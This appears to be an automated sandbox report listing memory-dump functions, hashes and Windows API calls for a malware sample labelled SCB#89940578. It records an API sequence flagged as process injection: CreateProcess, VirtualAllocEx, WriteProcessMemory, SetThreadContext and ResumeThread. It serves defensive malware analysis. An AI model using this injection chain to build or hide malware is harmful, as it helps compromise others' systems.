Source File: 00000000.00000002.1707555025.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f30000_SCB#89940578.jbxd

Similarity

API ID:
String ID: ($($($($($($,$,$,$,$,$,$,$,$-$-$-$.$.$.$.$.$/$/$1$7$7$K$[$\-$i
API String ID: 0-851490389
Opcode ID: 6f1d5c39dd98b5a4c5a4c9d6015cbbabde9805fbfe8ba2ec04a5f6fe54e61f1c
Instruction ID: 2ea6df727eac1bbd7edaddfc85d60630a65cc73e1022e91c72fcbff47482ba59
Opcode Fuzzy Hash: 6f1d5c39dd98b5a4c5a4c9d6015cbbabde9805fbfe8ba2ec04a5f6fe54e61f1c
Instruction Fuzzy Hash: D0033830A00215CFDB15EF34C894A98B7B2FF89305F5486A9E809AF365DB75AD85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 073723E0 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 832293960a58ee2f6f856dcbf8210ec4d247ae18932e9e2d98475b1b5901eb74
Instruction ID: f67635fd3f07d051b06537c53e6f59e78b5062757d2498bb4be0f7edf411fc65
Opcode Fuzzy Hash: 832293960a58ee2f6f856dcbf8210ec4d247ae18932e9e2d98475b1b5901eb74
Instruction Fuzzy Hash: BC9147B0D15219DFDB18CFA5E58199EFBB6FF8A310F20A41AE41ABB224D7349941CF14

Uniqueness

Uniqueness Score: -1.00%

Function 073723D1 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8c21d836aa080b00b07c456c4383b38f8c4de08b77ba4be8b655422990fed15
Instruction ID: 7e976bcf79af2952436c40f9d9ee695980b7017390d8e18eb8e35cc1b319b023
Opcode Fuzzy Hash: e8c21d836aa080b00b07c456c4383b38f8c4de08b77ba4be8b655422990fed15
Instruction Fuzzy Hash: 289146B0E11219DFDB18CFA5E58199EFBB6FF89310F20A41AE41AB7264D7389941CF14

Uniqueness

Uniqueness Score: -1.00%

Function 073720B8 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be991410c540da136336d85f88b1857a7559b19a4d782bcbb28a6d8d7279491a
Instruction ID: 557884c6661c653c5a629271c80e31b7428e2932280726fc1e1478bf6f3de28b
Opcode Fuzzy Hash: be991410c540da136336d85f88b1857a7559b19a4d782bcbb28a6d8d7279491a
Instruction Fuzzy Hash: 808112B4E14219CFDB14CFA9D9809AEFBF2FF89300F10A56AE415A7254D7389942CF54

Uniqueness

Uniqueness Score: -1.00%

Function 073720C8 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a658034c7a1ac72b8cf65c642889f58c9f53840e33602ec3de09c6bdeb8b663f
Instruction ID: dbd0905e0f1b8e29e9f6b1f5eb23f2e2940ea70d2e819d8f7bc8db919fcb0019
Opcode Fuzzy Hash: a658034c7a1ac72b8cf65c642889f58c9f53840e33602ec3de09c6bdeb8b663f
Instruction Fuzzy Hash: CA8120B4E10219CFDB14CFA9C9809AEFBF6FB89300F10A52AE505B7254D7389942CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0737FB3D Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0737FD7E

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c76415d916bd3dd8108fcd7fd72296d56e818976374daba1754442d0bbe20781
Instruction ID: 704d98ebc1755e9361cc47fb98aacc950c0eee4ae084882838588f36f0c10445
Opcode Fuzzy Hash: c76415d916bd3dd8108fcd7fd72296d56e818976374daba1754442d0bbe20781
Instruction Fuzzy Hash: 67A171B1D0021ADFEF20DF68C8417EDBBB2BF48314F148569D858A7244DB789986CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0737FB48 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0737FD7E

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fbbb1a1ab45a318eff7bef15d692826046e776fd133ef66d6ece529bafff9ca6
Instruction ID: 30b7f1e915d69ded0619b633a9ea69b22d6cda1bf5d085b682c0f92a77dcde5c
Opcode Fuzzy Hash: fbbb1a1ab45a318eff7bef15d692826046e776fd133ef66d6ece529bafff9ca6
Instruction Fuzzy Hash: 6F9172B1D0021ADFEF20DF68C8417EDBBB2BF48314F148569D858A7244DB749986CF92

Uniqueness

Uniqueness Score: -1.00%

Function 029844E4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 029859A9

Memory Dump Source

Source File: 00000000.00000002.1705635851.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_SCB#89940578.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 18c008e512e343fff9b28ecb30f8d3213aae05eee2abc05a499fc2e952cfe628
Instruction ID: 193947aae30087b0a22d5c873c117cbef09dee1687bd3f40218ee681e356f775
Opcode Fuzzy Hash: 18c008e512e343fff9b28ecb30f8d3213aae05eee2abc05a499fc2e952cfe628
Instruction Fuzzy Hash: 93410FB0C00719CBDB24DFA9C884BCEBBB5BF48304F25806AD448BB251DB756949CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04F34050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04F34111

Memory Dump Source

Source File: 00000000.00000002.1707555025.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4f30000_SCB#89940578.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 79e140f7f5f26b602a136a36315af9236a74360f5d49ad99b3bf6297b4b43fbb
Instruction ID: fa6cac4505d06340be045aad4b36dc7f83e0fba8807d84e1ed8a1c253e392575
Opcode Fuzzy Hash: 79e140f7f5f26b602a136a36315af9236a74360f5d49ad99b3bf6297b4b43fbb
Instruction Fuzzy Hash: 7E4125B5A00219DFDB14DF89C888AABBBF5FB88315F24C459D459AB321D374A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0737F8B8 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0737F950

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 99788917bad858d335460cfd03e3cddf6c72ec89c4167ce3c7c5c1823b3899da
Instruction ID: 918946f6a665153e1c8a1ad66802c3c9afbc3bae8fad8d1216b886b5559554c1
Opcode Fuzzy Hash: 99788917bad858d335460cfd03e3cddf6c72ec89c4167ce3c7c5c1823b3899da
Instruction Fuzzy Hash: 6F2137B19002599FDB10DFA9C885BDEBBF4FB48320F108429E958A7240C778A544CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0737F8C0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0737F950

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f0bda76dfe74ac5e2f0b545b3c774031b6779524825e55cc5dee9b5e0a1a747e
Instruction ID: 19cb1ef84168cf0bd0016551ee0a5633f1107491de2aba34c54139b8a1e59828
Opcode Fuzzy Hash: f0bda76dfe74ac5e2f0b545b3c774031b6779524825e55cc5dee9b5e0a1a747e
Instruction Fuzzy Hash: A22127B1900359DFDB10DFAAC885BDEBBF5FF48310F108429E958A7250C7789944CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0737EEB0 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0737EF36

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2249d9bd915c6ba86e0bdfa44c0f36f87a8728972080d8c64855691dbbf49f8c
Instruction ID: 593cb092fa8b9d9646260634c0b6b460418c308b46383207cb900625fdcf223d
Opcode Fuzzy Hash: 2249d9bd915c6ba86e0bdfa44c0f36f87a8728972080d8c64855691dbbf49f8c
Instruction Fuzzy Hash: 6F2159B19002099FDB20DFAAC4857EEBBF4EF48320F54842AD458A7241C7789544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0737F9A8 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0737FA30

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4f4b96a5119de9badc04f26362c11e0441ca62c0cb75a6112a6bbb7c35a2b247
Instruction ID: 72cb898eb7fb634b327820f985b7f9dc4a1605d2649bd3d40082b20c29bc6cd5
Opcode Fuzzy Hash: 4f4b96a5119de9badc04f26362c11e0441ca62c0cb75a6112a6bbb7c35a2b247
Instruction Fuzzy Hash: F92136B18002599FDB10DFAAC881AEEFBF5FF48320F10842AE558A7250D7389945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0298B6D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0298D586,?,?,?,?,?), ref: 0298D647

Memory Dump Source

Source File: 00000000.00000002.1705635851.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_SCB#89940578.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7e0fb5dc8e1176cee472a6de57fa84c3ee6005f46b7923f8cde2930596d171bd
Instruction ID: 5a65a47942483f6065f627f1115ab765c927fcb67a97cc4dd3f1664614403063
Opcode Fuzzy Hash: 7e0fb5dc8e1176cee472a6de57fa84c3ee6005f46b7923f8cde2930596d171bd
Instruction Fuzzy Hash: CB21E4B5901208EFDB10DFAAD584ADEBBF8FB48324F14841AE958A7350D374A940CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0737EEB8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0737EF36

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: cde84628098a8893a49fee21d912429fba8aa76636d807afbbbad415011fb6ea
Instruction ID: 5228710f8f1f39014d53ab8ee6955d602947bbe82f64542b9b6c28e296d50b8b
Opcode Fuzzy Hash: cde84628098a8893a49fee21d912429fba8aa76636d807afbbbad415011fb6ea
Instruction Fuzzy Hash: 5F2149B1D003098FDB10DFAAC4857EEBBF4EF88324F548429D459A7240C7789944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0737F9B0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0737FA30

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4486977cd1bd24c8f120ef70d1928307eff2856694755186edbc11aa4668445c
Instruction ID: 5856daf899c50fbd2df78082f87c63dee1eeaf47a0e5c3c0c6809b2877ed0225
Opcode Fuzzy Hash: 4486977cd1bd24c8f120ef70d1928307eff2856694755186edbc11aa4668445c
Instruction Fuzzy Hash: AF2128B18002599FDB10DFAAC880AEEFBF5FF48320F108429E558A7250C7389545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0298A0A8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0298AFB9,00000800,00000000,00000000), ref: 0298B1CA

Memory Dump Source

Source File: 00000000.00000002.1705635851.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_SCB#89940578.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f3b9606bfcc803d0590163c57d55729c3e5327fe5da1d9f1c230e80db3e5a4c5
Instruction ID: 8360d57849c1fee716df45f8c43fc3765da6b003e639a44b39c49b50a89efa88
Opcode Fuzzy Hash: f3b9606bfcc803d0590163c57d55729c3e5327fe5da1d9f1c230e80db3e5a4c5
Instruction Fuzzy Hash: B51126B69003099FDB10DF9AC944BEEFBF4EB88314F14842AE459AB210C375A544CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0737F7F8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0737F86E

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0d866ba89294cde24f6650338b81573ef87cc533b2fe0e096fca58924e351c2b
Instruction ID: 587f7573a51c1fd44e6c9c55292c6ac4540fc6af5fb6aeb8004fb6d19de57a57
Opcode Fuzzy Hash: 0d866ba89294cde24f6650338b81573ef87cc533b2fe0e096fca58924e351c2b
Instruction Fuzzy Hash: 651159B69002499FDB20DFAAC844BDEBFF5EF88324F148819E599A7250C735A544CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0737F800 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0737F86E

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 148002e5854ce021083cf3fe0a6dac06d57a627cd91aff1cecb262226a446779
Instruction ID: 914c7bfac8f161dc4f3c148ab1fe6826a8ffc2fda0af6607c949744dcc2743c1
Opcode Fuzzy Hash: 148002e5854ce021083cf3fe0a6dac06d57a627cd91aff1cecb262226a446779
Instruction Fuzzy Hash: 931137B29002499FDB20DFAAC844BDEBFF5FF88324F148819E559A7250C775A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0737EE00 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0737EE6A

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: dcc10adf4a7019a3da46945e19c48656acb59e443e2bbc29e2916d19298f8fef
Instruction ID: 33bb8a5aee9ae4325b9a5eeaeae06c9536320158883361e877f15757263e78ef
Opcode Fuzzy Hash: dcc10adf4a7019a3da46945e19c48656acb59e443e2bbc29e2916d19298f8fef
Instruction Fuzzy Hash: BD1158B19002498FDB24DFAAC5457DEFBF4EB88324F248819D459A7240C739A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0737EE08 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0737EE6A

Memory Dump Source

Source File: 00000000.00000002.1709081546.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SCB#89940578.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a364b026abcbf45f753eff2d89f025c286cf2e4fcad56bb1af9485dd78c03ee9
Instruction ID: 5a8c79fc8ca92deef8eb2453494725d84d020d3786d7e553828be7434c475a6f
Opcode Fuzzy Hash: a364b026abcbf45f753eff2d89f025c286cf2e4fcad56bb1af9485dd78c03ee9
Instruction Fuzzy Hash: 891136B19002498FDB20DFAAC4457DEFBF5EB88324F208829D459A7250CB79A944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0298AED8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0298AF3E

Memory Dump Source

Source File: 00000000.00000002.1705635851.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2980000_SCB#89940578.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 16c68b192cc0ff4ad5967b5a93ba24d2148c33d5a5f2a9e2e1405cf9f0a480eb
Instruction ID: cc2011e1724c20f905c5095fbe3b1511ba79223a21c73582ec99796a51f58af5
Opcode Fuzzy Hash: 16c68b192cc0ff4ad5967b5a93ba24d2148c33d5a5f2a9e2e1405cf9f0a480eb
Instruction Fuzzy Hash: 3B1110B6C003498FDB10DF9AC544ADEFBF8AF88324F14846AD468A7210C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D8D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705079647.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d8d000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c9884737ad0e3a2105ac5a26bf1be59d76122611413fb66b47d9465e942a0bf
Instruction ID: 18a3f739832075ff6b47e77a0a77688fb507144c5e534bb3e0780cec2b9cd1bb
Opcode Fuzzy Hash: 4c9884737ad0e3a2105ac5a26bf1be59d76122611413fb66b47d9465e942a0bf
Instruction Fuzzy Hash: 7421F171504204EFCB05EF14D9C4B2ABF66FB88310F24C669E9494A2D6C336D816CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D8D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705079647.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d8d000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f40f9de9020557db0fdba84450a55f19ecd0afe079828cff489f2dc24d5cfa60
Instruction ID: e1abffe5b6ae440c54162c958e89b58b7f7539a6ffa11bc8ff5ec7f7eb5db8a2
Opcode Fuzzy Hash: f40f9de9020557db0fdba84450a55f19ecd0afe079828cff489f2dc24d5cfa60
Instruction Fuzzy Hash: B6212871500204DFDB05EF18D9C0B26BF66FB94324F24C169D9094B2D6C336E856C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00D9D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705125434.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d9d000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6178c6b9decd89b822afd1e48aed5beaf650755b4cb20b8d28a3cc37a8f99482
Instruction ID: 4c88d48df9d49e3499ccab148cd16c5857a294fa060f2b72bfcf792743243e90
Opcode Fuzzy Hash: 6178c6b9decd89b822afd1e48aed5beaf650755b4cb20b8d28a3cc37a8f99482
Instruction Fuzzy Hash: CA21FF71604200DFDF14DF24D984B26BBA6FB88314F24C669E84E4B296C33AD847CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00D9D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705125434.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d9d000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2f9859fc5aaaf07be3e73b243aee3e65564a3c7bf0201216c5ab4d5aa655a7d
Instruction ID: 560d0c1eb95f5d4edc41dc7daf7e25bbf5bbac3a745e1e9b37cfddcd67458da1
Opcode Fuzzy Hash: f2f9859fc5aaaf07be3e73b243aee3e65564a3c7bf0201216c5ab4d5aa655a7d
Instruction Fuzzy Hash: 06210471504200EFDF05DF14DAC0B2ABBA6FB84314F24C66DE9494B296C336D846CA75

Uniqueness

Uniqueness Score: -1.00%

Function 00D9D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705125434.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d9d000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60eea47fd86717dc985f13cac6388d71597a140dcbf15b7a5b6af607c32ee616
Instruction ID: b48549c2ddacd86f72be73a2706353f6a4c860a14c53b01b1e07b2b5e9d24ef9
Opcode Fuzzy Hash: 60eea47fd86717dc985f13cac6388d71597a140dcbf15b7a5b6af607c32ee616
Instruction Fuzzy Hash: DC215E755093808FDB16CF24D994715BF72EB46314F28C5EAD8498F6A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00D8D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705079647.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d8d000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
Instruction ID: eb2313b4d51cf731243ccc57746ba8666713d9306363abdad9fa4d19d49b9100
Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
Instruction Fuzzy Hash: 5221E176404244DFCB06DF00D9C4B16BF72FB84314F28C2A9DC084B296C33AD82ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D8D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705079647.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d8d000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 9c6cc4a5cc4e047525d37f4c28b8d773c46abf5c3abbf1e23a1500b95479de56
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 92112672404240DFCB02DF04D5C4B16BF72FB94324F28C2A9DC090B296C33AE85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D9D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705125434.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d9d000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: b97cb94ab9312380e2a6ed81380da5a595f1121ad4d0e70096b292b1de9a3e1c
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 90118B75504280DFDB16CF14D5C4B15BBA2FB94314F28C6AAD8494B696C33AD84ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D8D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705079647.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d8d000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e2df81222f0157852649bdf8d3dafe9a28de85313b08daf331cfd3490fa47b
Instruction ID: 65fd0aefdead453157a90d5297690caa08ee6c16a2326b70cfde26faba582edf
Opcode Fuzzy Hash: 70e2df81222f0157852649bdf8d3dafe9a28de85313b08daf331cfd3490fa47b
Instruction Fuzzy Hash: 7D012B710093409AE7106E26CDC4B67BF9DEF41364F1CC92AED4A0A2C6C279DC41CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00D8D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1705079647.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d8d000_SCB#89940578.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb44b9daf348bb8f6cb2ed924e1ca8795d225101a6426cf095fe724680ce577
Instruction ID: ce62538e44242a39dae3f22137a81682c224dc5a9695006bb19e54b57049938b
Opcode Fuzzy Hash: ecb44b9daf348bb8f6cb2ed924e1ca8795d225101a6426cf095fe724680ce577
Instruction Fuzzy Hash: 1DF0C2710053409AE7109E16CCC8B62FFA8EB51334F18C45AED090A2C6C2799C40CBB0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07375F70 Relevance: 5.3, Strings: 4, Instructions: 259COMMON

Download Yara Rule

Strings

